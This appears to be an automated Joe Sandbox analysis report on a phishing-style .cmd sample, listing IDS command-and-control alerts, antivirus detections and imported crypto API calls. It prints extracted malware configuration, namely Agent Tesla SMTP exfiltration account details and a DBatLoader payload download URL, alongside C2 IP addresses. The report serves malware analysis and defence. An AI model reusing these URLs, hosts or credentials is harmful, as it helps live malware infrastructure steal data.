                      2024-11-18T09:59:19.305680+010020377711A Network Trojan was detected3.254.94.18580192.168.2.1050079TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-18T09:57:32.855723+010028508511Malware Command and Control Activity Detected192.168.2.104981754.244.188.17780TCP
                      2024-11-18T09:58:35.573680+010028508511Malware Command and Control Activity Detected192.168.2.105002734.211.97.4580TCP
                      2024-11-18T09:59:37.019071+010028508511Malware Command and Control Activity Detected192.168.2.105010954.244.188.17780TCP
                      2024-11-18T10:00:37.951578+010028508511Malware Command and Control Activity Detected192.168.2.105022918.208.156.24880TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for dropped file
                      Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Found malware configuration
                      Source: WmiPrvSE.exe.1528.38.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "info2@j-fores.com", "Username": "info@j-fores.com", "Password": "18 Nov 2024 04:29:17 -0500"}
                      Source: AnyDesk.PIF.14.drMalware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak2/233_Juqmtmyadyy"]}
                      Multi AV Scanner detection for submitted file
                      Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdReversingLabs: Detection: 13%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Machine Learning detection for dropped file
                      Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A52F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,12_2_00007FF627A52F38
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A52C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,12_2_00007FF627A52C2C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE08EC BCryptGetProperty,#205,#359,#357,#357,12_2_00007FF627AE08EC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B14914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,12_2_00007FF627B14914
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A5A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,12_2_00007FF627A5A8CC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACE914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,12_2_00007FF627ACE914
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE0844 BCryptExportKey,#205,#359,#357,#357,12_2_00007FF627AE0844
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B4E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,12_2_00007FF627B4E8B0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE07F4 BCryptDestroyKey,#205,#357,12_2_00007FF627AE07F4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACC7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,12_2_00007FF627ACC7F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B18814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,12_2_00007FF627B18814
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF07D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,12_2_00007FF627AF07D0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A467CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627A467CC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD27BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627AD27BC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A66824 CryptHashCertificate,GetLastError,#357,12_2_00007FF627A66824
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE0740 BCryptCloseAlgorithmProvider,#205,#357,#357,12_2_00007FF627AE0740
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,12_2_00007FF627B1A740
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE07A4 BCryptDestroyHash,#205,#357,12_2_00007FF627AE07A4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A826E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,12_2_00007FF627A826E0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD2724 CryptDecodeObject,GetLastError,#357,12_2_00007FF627AD2724
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B086D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,12_2_00007FF627B086D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B166D8 NCryptFreeObject,#360,12_2_00007FF627B166D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AAA654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,12_2_00007FF627AAA654
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B16654 NCryptGetProperty,#360,12_2_00007FF627B16654
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB4694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,12_2_00007FF627AB4694
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A76694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,12_2_00007FF627A76694
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,12_2_00007FF627AA25E8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,12_2_00007FF627A6C5D4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A70630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627A70630
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A68600 #357,CryptDecodeObject,GetLastError,LocalFree,12_2_00007FF627A68600
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B4A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,12_2_00007FF627B4A58C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,12_2_00007FF627B1A590
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE65B4 NCryptIsKeyHandle,_CxxThrowException,12_2_00007FF627AE65B4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ADE57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,12_2_00007FF627ADE57C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A544E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627A544E0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0E516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,12_2_00007FF627B0E516
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB24D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,12_2_00007FF627AB24D4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,12_2_00007FF627A6C514
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ABA450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,12_2_00007FF627ABA450
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ABC450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,12_2_00007FF627ABC450
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD8488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,12_2_00007FF627AD8488
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A823E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,12_2_00007FF627A823E8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B18404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,12_2_00007FF627B18404
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A64410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627A64410
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD6374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,12_2_00007FF627AD6374
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD2358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,12_2_00007FF627AD2358
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6E3B0 #357,#357,CryptDecodeObject,LocalFree,12_2_00007FF627A6E3B0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B4A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,12_2_00007FF627B4A2E0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A80300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,12_2_00007FF627A80300
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B18298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,12_2_00007FF627B18298
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB6280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627AB6280
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B02278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,12_2_00007FF627B02278
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0E274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,12_2_00007FF627B0E274
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,12_2_00007FF627B1A1F8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACA1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,12_2_00007FF627ACA1E8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B46214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,12_2_00007FF627B46214
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ADE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,12_2_00007FF627ADE1F8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B4613C CryptDecodeObjectEx,12_2_00007FF627B4613C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B061AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,12_2_00007FF627B061AC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A821A4 #360,#359,#357,#357,BCryptFreeBuffer,12_2_00007FF627A821A4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC6194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,12_2_00007FF627AC6194
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,12_2_00007FF627AA417C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE10D8 NCryptSetProperty,#205,#359,#357,#359,#357,12_2_00007FF627AE10D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE30D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,12_2_00007FF627AE30D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B17124 BCryptGenerateKeyPair,#360,12_2_00007FF627B17124
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A99134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,12_2_00007FF627A99134
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B170C8 BCryptSetProperty,#360,12_2_00007FF627B170C8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,12_2_00007FF627B0511C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE1058 NCryptOpenStorageProvider,#205,#359,#357,12_2_00007FF627AE1058
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AEB0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,12_2_00007FF627AEB0A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AAB098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,12_2_00007FF627AAB098
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1705C BCryptGetProperty,#360,12_2_00007FF627B1705C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A8107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,12_2_00007FF627A8107C
